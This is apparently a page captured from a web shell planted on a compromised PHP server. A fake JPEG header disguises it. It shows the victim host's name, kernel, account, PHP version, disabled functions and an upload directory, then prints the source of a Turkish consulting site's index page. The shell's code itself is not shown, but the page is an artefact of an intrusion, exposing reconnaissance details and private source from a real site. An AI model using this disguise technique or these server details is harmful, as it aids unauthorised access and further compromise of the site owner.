ÿØÿà JFIF ` ` ÿþ
|
Server : Apache/2 System : Linux srv244.medyabim.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64 User : lionbursa ( 1773) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/lionbursa/domains/lionuluslararasidanismanlik.com/public_ftp/incoming/ |
Upload File : |
<?php
ob_start();
session_start();
include 'ayarlar.php';
global $db;
$sql = $db->query("SELECT * FROM ayarlar");
foreach ($sql as $a);
if ($a[bakim] == "0"){
$bakimmodu = $a["bakim"];
} else {
require ("sistem/bakimmodu.php");
die;
}
array_map('guvenlik', $_GET);
if ( isset($_GET['bosalt']) ){
foreach ( $_COOKIE['dilata'] as $key => $val ){
setcookie('dilata['.$key.']', $key, time() - 86400);
}
header('Location:'.$_SERVER['HTTP_REFERER']);
}
if ( isset($_GET['dilsecildi']) ){
$id = $_GET['dilsecildi'];
setcookie('dilata['.$id.']', time() + (86450));
header('Location:'.$_SERVER['HTTP_REFERER']);
}
?>
<?php
foreach ( $_COOKIE['dilata'] as $kod => $val );
$degisken = $kod; ?>
<?php include 'sistem/dil.php'; ?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<?php include 'sistem/titlekey.php'; ?>
<?php include 'sistem/jscss.php'; ?>
</head><!-- /End head -->
<body class="has-side-panel side-panel-right fullwidth-page">
<div id="wrapper" class="clearfix">
<!-- preloader -->
<div id="preloader">
<div id="spinner">
<img alt="" src="style/images/preloaders/5.gif">
</div>
<div id="disable-preloader" class="btn btn-default btn-sm">Yükleniyor</div>
</div>
<?php include 'sistem/menupc.php'; ?>
<?php include("ofisimo.php");?>
<?php include 'sistem/footer.php'; ?>
</div>
</body>
</html>
<?php
ob_end_flush();
?>